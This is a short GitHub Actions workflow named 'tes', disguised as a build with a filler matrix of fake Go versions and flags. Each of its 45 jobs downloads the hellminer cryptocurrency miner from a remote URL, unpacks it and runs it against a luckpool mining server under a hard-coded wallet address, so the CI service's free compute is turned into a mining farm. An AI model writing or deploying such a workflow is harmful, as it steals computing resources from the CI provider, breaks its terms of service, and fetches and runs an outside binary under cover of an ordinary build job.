name: tes
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: tes
    runs-on: windows-latest
    strategy:
      max-parallel: 10
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx2.zip -OutFile hellminer_cpu_win64_avx2.zip
    - name: Seting-UP
      run: Expand-Archive hellminer_cpu_win64_avx2.zip
    - name: Running
      run: .\hellminer.exe -c stratum+tcp://na.luckpool.net:3956#xnsub -u RQwcGe5FpouQR8MaF4hEnnR1dsP1jaJFq6.$(echo $(shuf -i 1-5 -n 1)-cir) -p x --cpu 2
    - name: END
      run: exit
